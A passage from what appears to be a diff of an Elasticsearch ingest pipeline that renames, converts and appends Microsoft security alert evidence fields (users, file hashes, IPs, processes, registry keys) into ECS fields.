true + processor: + append: + field: related.user + tag: append_inside_foreach_loggedOnUsers_account_name + value: '{{{_ingest._value.account_name}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: double_foreach_evidence_rename_loggedOnUsers_domainName + if: ctx.json?.evidence instanceof List + processor: + foreach: + field: _ingest._value.loggedOnUsers + tag: inside_foreach_rename_loggedOnUsers_domainName + ignore_missing: true + processor: + rename: + field: _ingest._value.domainName + tag: rename_foreach_loggedOnUsers_domainName + target_field: _ingest._value.domain_name + ignore_missing: true + - foreach: + field: json.evidence + tag: double_foreach_evidence_loggedOnUsers_append_domain_name + if: ctx.json?.evidence instanceof List + processor: + foreach: + field: _ingest._value.loggedOnUsers + tag: inside_foreach_loggedOnUsers_append_domainName + ignore_missing: true + processor: + append: + field: related.hosts + tag: append_inside_foreach_loggedOnUsers_domainName + value: '{{{_ingest._value.domain_name}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: double_foreach_evidence_loggedOnUsers_dot_expander_@odata_type + if: ctx.json?.evidence instanceof List + processor: + foreach: + field: _ingest._value.loggedOnUsers + tag: inside_foreach_dot_expander_loggedOnUsers + ignore_missing: true + processor: + dot_expander: + field: '@odata.type' + path: _ingest._value + ignore_failure: true + override: true + - foreach: + field: json.evidence + tag: double_foreach_evidence_loggedOnUsers_rename_@odata_type + if: ctx.json?.evidence instanceof List + processor: + foreach: + field: _ingest._value.loggedOnUsers + tag: inside_foreach_loggedOnUsers_rename_@odata_type + ignore_missing: true + processor: + rename: + field: _ingest._value.@odata.type + tag: rename_evidence_foreach_loggedOnUsers_@odata_type + target_field: _ingest._value.odata_type + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_loggedOnUsers + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.loggedOnUsers + target_field: _ingest._value.logged_on_users + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_onboardingStatus_rename + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.onboardingStatus + target_field: _ingest._value.onboarding_status + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_convert_osBuild + if: ctx.json?.evidence instanceof List + processor: + convert: + field: _ingest._value.osBuild + tag: convert_foreach_evidence_osBuild + target_field: _ingest._value.os_build + type: string + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.osBuild + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.evidence + tag: foreach_evidence_convert_rbacGroupId + if: ctx.json?.evidence instanceof List + processor: + convert: + field: _ingest._value.rbacGroupId + tag: convert_foreach_evidence_rbacGroupId + target_field: _ingest._value.rbac_group.id + type: string + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.rbacGroupId + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.evidence + tag: foreach_rename_evidence_rbacGroupName + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.rbacGroupName + tag: rename_foreach_evidence_rbacGroupName + target_field: _ingest._value.rbac_group.name + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_riskScore + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.riskScore + tag: rename_foreach_evidence_riskScore + target_field: _ingest._value.risk_score + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_dot_expander_vmMetadata + if: ctx.json?.evidence instanceof List + processor: + dot_expander: + field: '@odata.type' + path: _ingest._value.vmMetadata + ignore_failure: true + override: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_vmMetadata_@odata_type + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.vmMetadata.@odata.type + tag: rename_foreach_evidence_vmMetadata_@odata_type + target_field: _ingest._value.vm_metadata.odata_type + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_vmMetadata_resourceId + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.vmMetadata.resourceId + tag: rename_foreach_evidence_vmMetadata_resourceId + target_field: _ingest._value.vm_metadata.resource_id + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_vmMetadata_subscriptionId + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.vmMetadata.subscriptionId + tag: rename_foreach_evidence_vmMetadata_subscriptionId + target_field: _ingest._value.vm_metadata.subscription_id + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_vmMetadata_vmId + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.vmMetadata.vmId + tag: rename_foreach_evidence_vmMetadata_vmId + target_field: _ingest._value.vm_metadata.vm_id + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_detectionStatus + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.detectionStatus + tag: rename_foreach_evidence_detectionStatus + target_field: _ingest._value.detection_status + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_detection_status + if: ctx.json?.evidence instanceof List + processor: + append: + field: event.action + tag: append_foreach_evidence_detection_status + value: '{{{_ingest._value.detection_status}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_dot_expander_fileDetails + if: ctx.json?.evidence instanceof List + processor: + dot_expander: + field: '@odata.type' + path: _ingest._value.fileDetails + ignore_failure: true + override: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_fileDetails_@odata_type + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.fileDetails.@odata.type + tag: rename_foreach_evidence_fileDetails_@odata_type + target_field: _ingest._value.file_details.odata_type + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_fileDetails_sha1 + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.fileDetails.sha1 + tag: rename_foreach_evidence_fileDetails_sha1 + target_field: _ingest._value.file_details.sha1 + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_fileDetails_sha1_into_fileHashSha1 + if: ctx.json?.evidence instanceof List + processor: + append: + field: file.hash.sha1 + tag: append_foreach_evidence_fileDetails_sha1_into_fileHashSha1 + value: '{{{_ingest._value.file_details.sha1}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_append_fileDetails_sha1_into_related_hash + if: ctx.json?.evidence instanceof List + processor: + append: + field: related.hash + tag: append_foreach_evidence_fileDetails_sha1_into_related_hash + value: '{{{_ingest._value.file_details.sha1}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_rename_fileDetails_sha256 + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.fileDetails.sha256 + tag: rename_foreach_evidence_fileDetails_sha256 + target_field: _ingest._value.file_details.sha256 + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_filedetails_sha256_into_file_hash_sha256 + if: ctx.json?.evidence instanceof List + processor: + append: + field: file.hash.sha256 + tag: append_foreach_evidence_filedetails_sha256_into_file_hash_sha256 + value: '{{{_ingest._value.file_details.sha256}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_append_filedetails_sha256_into_related_hash + if: ctx.json?.evidence instanceof List + processor: + append: + field: related.hash + tag: append_foreach_evidence_filedetails_sha256_into_related_hash + value: '{{{_ingest._value.file_details.sha256}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_rename_fileDetails_fileName + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.fileDetails.fileName + tag: rename_foreach_evidence_fileDetails_FileName + target_field: _ingest._value.file_details.name + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_fileDetails_name + if: ctx.json?.evidence instanceof List + processor: + append: + field: file.name + tag: append_foreach_evidence_fileDetails_name + value: '{{{_ingest._value.file_details.name}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_rename_fileDetails_filePath + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.fileDetails.filePath + tag: rename_foreach_evidence_fileDetails_filePath + target_field: _ingest._value.file_details.path + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_fileDetails_path + if: ctx.json?.evidence instanceof List + processor: + append: + field: file.path + tag: append_foreach_evidence_fileDetails_path + value: '{{{_ingest._value.file_details.path}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_convert_fileSize + if: ctx.json?.evidence instanceof List + processor: + convert: + field: _ingest._value.fileDetails.fileSize + tag: convert_foreach_evidence_fileSize + target_field: _ingest._value.file_details.size + type: long + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.fileDetails.fileSize + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.evidence + tag: foreach_evidence_rename_filePublisher + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.fileDetails.filePublisher + tag: rename_foreach_evidence_filePublisher + target_field: _ingest._value.file_details.publisher + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_issuer + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.fileDetails.issuer + tag: rename_foreach_evidence_issuer + target_field: _ingest._value.file_details.issuer + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_signer + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.fileDetails.signer + tag: rename_evidence_foreach_signer + target_field: _ingest._value.file_details.signer + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_convert_ipAddress + if: ctx.json?.evidence instanceof List + processor: + convert: + field: _ingest._value.ipAddress + tag: convert_foreach_evidence_ipAddress + target_field: _ingest._value.ip_address + type: ip + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.ipAddress + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.evidence + tag: foreach_evidence_append_ip_address_into_host_ip + if: ctx.json?.evidence instanceof List + processor: + append: + field: host.ip + tag: append_foreach_evidence_ip_address_into_host_ip + value: '{{{_ingest._value.ip_address}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_append_ip_address_into_related_ip + if: ctx.json?.evidence instanceof List + processor: + append: + field: related.ip + tag: append_foreach_evidence_ip_address_into_related_ip + value: '{{{_ingest._value.ip_address}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_dot_expander_userAccount + if: ctx.json?.evidence instanceof List + processor: + dot_expander: + field: '@odata.type' + path: _ingest._value.userAccount + ignore_failure: true + override: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_userAccount_odata_type + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.userAccount.@odata.type + tag: renane_foreach_evidence_userAccount_odata_type + target_field: _ingest._value.user_account.odata_type + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_useraccount_domainName + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.userAccount.domainName + tag: rename_foreach_evidence_useraccount_domainName + target_field: _ingest._value.user_account.domain_name + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_useraccount_domain_name + if: ctx.json?.evidence instanceof List + processor: + append: + field: related.hosts + tag: append_foreach_evidence_useraccount_domain_name + value: '{{{_ingest._value.user_account.domain_name}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_rename_useraccount_azureAdUserId + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.userAccount.azureAdUserId + tag: rename_foreach_evidence_useraccount_azureAdUserId + target_field: _ingest._value.user_account.azure_ad_user_id + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_useraccount_azureAdUserId + if: ctx.json?.evidence instanceof List + processor: + append: + field: related.user + tag: append_foreach_evidence_useraccount_azureAdUserId + value: '{{{_ingest._value.user_account.azure_ad_user_id}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_rename_useraccount_userPrincipalName + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.userAccount.userPrincipalName + tag: rename_foreach_evidence_useraccount_userPrincipalName + target_field: _ingest._value.user_account.user_principal_name + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_useraccount_user_principal_name + if: ctx.json?.evidence instanceof List + processor: + append: + field: related.user + tag: append_foreach_evidence_useraccount_user_principal_name + value: '{{{_ingest._value.user_account.user_principal_name}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_rename_primaryAddress + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.primaryAddress + tag: rename_foreach_evidence_primaryAddress + target_field: _ingest._value.primary_address + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_useraccount_accountname + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.userAccount.accountName + tag: rename_foreach_evidence_useraccount_accountname + target_field: _ingest._value.user_account.account_name + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_useraccount_accountname + if: ctx.json?.evidence instanceof List + processor: + append: + field: related.user + tag: append_foreach_evidence_useraccount_accountname + value: '{{{_ingest._value.user_account.account_name}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_rename_useraccount_userSid + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.userAccount.userSid + tag: rename_foreach_evidence_useraccount_userSid + target_field: _ingest._value.user_account.user_sid + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_useraccount_userSid + if: ctx.json?.evidence instanceof List + processor: + append: + field: related.user + tag: append_foreach_evidence_useraccount_userSid + value: '{{{_ingest._value.user_account.user_sid}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_rename_clusterBy + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.clusterBy + tag: rename_foreach_evidence_clusterBy + target_field: _ingest._value.cluster_by + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_ename_clusterByValue + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.clusterByValue + tag: rename_evidence_foreach_clusterByValue + target_field: _ingest._value.cluster_by_value + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_convert_emailCount + if: ctx.json?.evidence instanceof List + processor: + convert: + field: _ingest._value.emailCount + tag: convert_foreach_evidence_emailCount + target_field: _ingest._value.email_count + type: long + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.emailCount + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.evidence + tag: foreach_evidence_rename_networkMessageIds + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.networkMessageIds + tag: rename_foreach_evidence_networkMessageId + target_field: _ingest._value.network_message_ids + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_rename_evidence_objectId + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.objectId + tag: rename_foreach_evidence_objectId + target_field: _ingest._value.object_id + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_processCommandLine + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.processCommandLine + tag: rename_foreach_evidence_processCommandLine + target_field: _ingest._value.process.command_line + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_processCommandLine + if: ctx.json?.evidence instanceof List + processor: + append: + field: process.command_line + tag: append_foreach_evidence_processCommandLine + value: '{{{_ingest._value.process.command_line}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_dot_expander_imageFile + if: ctx.json?.evidence instanceof List + processor: + dot_expander: + field: '@odata.type' + path: _ingest._value.imageFile + ignore_failure: true + override: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_imageFile_@odata_type + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.imageFile.@odata.type + tag: rename_foreach_evidence_imageFile_@odata_type + target_field: _ingest._value.image_file.odata_type + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_imagefile_sha1 + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.imageFile.sha1 + tag: rename_foreach_evidence_imagefile_sha1 + target_field: _ingest._value.image_file.sha1 + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_imagefile_sha1_into_process_hash_sha1 + if: ctx.json?.evidence instanceof List + processor: + append: + field: process.hash.sha1 + tag: append_foreach_evidence_imagefile_sha1_into_process_hash_sha1 + value: '{{{_ingest._value.image_file.sha1}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_append_imagefile_sha1_into_related_hash + if: ctx.json?.evidence instanceof List + processor: + append: + field: related.hash + tag: append_foreach_evidence_imagefile_sha1_into_related_hash + value: '{{{_ingest._value.image_file.sha1}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_imagefile_sha256 + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.imageFile.sha256 + tag: foreach_evidence_rename_imagefile_sha256 + target_field: _ingest._value.image_file.sha256 + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_imagefile_sha256_into_process_hash_sha256 + if: ctx.json?.evidence instanceof List + processor: + append: + field: process.hash.sha256 + tag: append_foreach_evidence_imagefile_sha256_into_process_hash_sha256 + value: '{{{_ingest._value.image_file.sha256}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_imagefile_sha256_into_related_hash + if: ctx.json?.evidence instanceof List + processor: + append: + field: related.hash + tag: append_foreach_evidence_imagefile_sha256_into_related_hash + value: '{{{_ingest._value.image_file.sha256}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_dot_expander_parentProcessImageFile + if: ctx.json?.evidence instanceof List + processor: + dot_expander: + field: '@odata.type' + path: _ingest._value.parentProcessImageFile + ignore_failure: true + override: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_parentProcessImageFile_@odata_type + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.parentProcessImageFile.@odata.type + tag: rename_foreach_evidence_parentProcessImageFile_@odata_type + target_field: _ingest._value.parent_process.image_file.odata_type + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_parentProcessImageFile_sha1 + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.parentProcessImageFile.sha1 + tag: rename_foreach_evidence_parentProcessImageFile_sha1 + target_field: _ingest._value.parent_process.image_file.sha1 + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_parentProcessImageFile_sha1_into_process_parent_hash_sha1 + if: ctx.json?.evidence instanceof List + processor: + append: + field: process.parent.hash.sha1 + tag: append_foreach_evidence_parentProcessImageFile_sha1_into_process_parent_hash_sha1 + value: '{{{_ingest._value.parent_process.image_file.sha1}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_append_parentProcessImageFile_sha1_into_related_hash + if: ctx.json?.evidence instanceof List + processor: + append: + field: related.hash + tag: append_foreach_evidence_parentProcessImageFile_sha1_into_related_hash + value: '{{{_ingest._value.parent_process.image_file.sha1}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_rename_parentProcessImageFile_sha256 + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.parentProcessImageFile.sha256 + tag: rename_foreach_evidence_parentProcessImageFile_sha256 + target_field: _ingest._value.parent_process.image_file.sha256 + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_parentProcessImageFile_sha256_into_process_parent_hash_sha256 + if: ctx.json?.evidence instanceof List + processor: + append: + field: process.parent.hash.sha256 + tag: append_foreach_evidence_parentProcessImageFile_sha256_into_process_parent_hash_sha256 + value: '{{{_ingest._value.parent_process.image_file.sha256}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_append_parentProcessImageFile_sha256_into_related_hash + if: ctx.json?.evidence instanceof List + processor: + append: + field: related.hash + tag: append_foreach_evidence_parentProcessImageFile_sha256_into_related_hash + value: '{{{_ingest._value.parent_process.image_file.sha256}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_convert_parentProcessId + if: ctx.json?.evidence instanceof List + processor: + convert: + field: _ingest._value.parentProcessId + tag: convert_foreach_evidence_parentProcessId + target_field: _ingest._value.parent_process.id + type: long + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.parentProcessId + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.evidence + tag: foreach_evidence_date_parentProcessCreationDateTime + if: ctx.json?.evidence instanceof List + processor: + date: + field: _ingest._value.parentProcessCreationDateTime + tag: date_foreach_evidence_parentProcessCreationDateTime + target_field: _ingest._value.parent_process.creation_datetime + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.parentProcessCreationDateTime + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_parentProcessCreationDateTime + if: ctx.json?.evidence instanceof List + processor: + append: + field: process.parent.start + tag: append_foreach_evidence_parentProcessCreationDateTime + value: '{{{_ingest._value.parent_process.creation_datetime}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_convert_processId + if: ctx.json?.evidence instanceof List + processor: + convert: + field: _ingest._value.processId + tag: convert_foreach_evidence_processId + target_field: _ingest._value.process.id + type: long + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.processId + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.evidence + tag: foreach_evidence_date_processCreationDateTime + if: ctx.json?.evidence instanceof List + processor: + date: + field: _ingest._value.processCreationDateTime + tag: date_foreach_evidence_processCreationDateTime + target_field: _ingest._value.process.creation_datetime + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.processCreationDateTime + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_processCreationDateTime + if: ctx.json?.evidence instanceof List + processor: + append: + field: process.start + tag: append_foreach_evidence_processCreationDateTime + value: '{{{_ingest._value.process.creation_datetime}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_rename_imageFile_filename + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.imageFile.fileName + tag: rename_foreach_evidence_imageFile_filename + target_field: _ingest._value.image_file.name + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_imageFile_filepath + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.imageFile.filePath + tag: rename_foreach_evidence_imageFile_filepath + target_field: _ingest._value.image_file.path + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_imageFile_filePublisher + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.imageFile.filePublisher + tag: rename_foreach_evidence_imageFile_filePublisher + target_field: _ingest._value.image_file.publisher + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_convert_imagefile_filesize + if: ctx.json?.evidence instanceof List + processor: + convert: + field: _ingest._value.imageFile.fileSize + tag: convert_foreach_evidence_imagefile_filesize + target_field: _ingest._value.image_file.size + type: long + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.imageFile.fileSize + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.evidence + tag: foreach_evidence_rename_imagefile_issuer + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.imageFile.issuer + tag: rename_foreach_evidence_imagefile_issuer + target_field: _ingest._value.image_file.issuer + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_imageFile_signer + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.imageFile.signer + tag: rename_foreach_evidence_imageFile_signer + target_field: _ingest._value.image_file.signer + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_parentProcessImageFile_filename + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.parentProcessImageFile.fileName + tag: rename_foreach_evidence_parentProcessImageFile_filename + target_field: _ingest._value.parent_process.image_file.name + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_parentProcessImageFile_filepath + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.parentProcessImageFile.filePath + tag: rename_foreach_evidence_parentProcessImageFile_filepath + target_field: _ingest._value.parent_process.image_file.path + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_parentProcessImageFile_filepublisher + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.parentProcessImageFile.filePublisher + tag: rename_foreach_evidence_parentProcessImageFile_filepublisher + target_field: _ingest._value.parent_process.image_file.publisher + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_convert_parentProcessImageFile_filesize + if: ctx.json?.evidence instanceof List + processor: + convert: + field: _ingest._value.parentProcessImageFile.fileSize + tag: convert_foreach_evidence_parentProcessImageFile_filesize + target_field: _ingest._value.parent_process.image_file.size + type: long + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.parentProcessImageFile.fileSize + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.evidence + tag: foreach_evidence_rename_parentProcessImageFile_issuer + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.parentProcessImageFile.issuer + tag: rename_foreach_evidence_parentProcessImageFile_issuer + target_field: _ingest._value.parent_process.image_file.issuer + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_parentProcessImageFile_signer + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.parentProcessImageFile.signer + tag: rename_foreach_evidence_parentProcessImageFile_signer + target_field: _ingest._value.parent_process.image_file.signer + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_registryHive + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.registryHive + tag: rename_foreach_evidence_registryHive + target_field: _ingest._value.registry_hive + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_registryHive + if: ctx.json?.evidence instanceof List + processor: + append: + field: registry.hive + tag: append_foreach_evidence_registryHive + value: '{{{_ingest._value.registry_hive}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_rename_registryKey + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.registryKey + tag: rename_foreach_evidence_registryKey + target_field: _ingest._value.registry_key + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_registryKey + if: ctx.json?.evidence instanceof List + processor: + append: + field: registry.key + tag: append_foreach_evidence_registryKey + value: '{{{_ingest._value.registry_key}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_rename_registryValueType + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.registryValueType + tag: rename_foreach_evidence_registryValueType + target_field: _ingest._value.registry_value_type + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_registryValueType + if: ctx.json?.evidence instanceof List + processor: + append: + field: registry.data.type + tag: append_foreach_evidence_registryValueType + value: '{{{_ingest._value.registry_value_type}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_rename_registryValue + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.registryValue + tag: rename_foreach_evidence_registryValue + target_field: _ingest._value.registry_value + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_registryValue + if: ctx.json?.evidence instanceof List + processor: + append: + field: registry.value + tag: append_foreach_evidence_registryValue + value: '{{{_ingest._value.registry_value}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_rename_registryValueName + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.registryValueName + tag: rename_foreach_evidence_registryValueName + target_field: _ingest._value.registry_value_name + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_securityGroupId + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.securityGroupId + tag: rename_foreach_evidence_securityGroupId + target_field: _ingest._value.security_group_id + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_securityGroupId + if: ctx.json?.evidence instanceof List + processor: + append: + field: group.id + tag: append_foreach_evidence_securityGroupId + value: '{{{_ingest._value.security_group_id}}}' + allow_duplicates: false + - script: + description: Map ecs fields based on evidence type. + 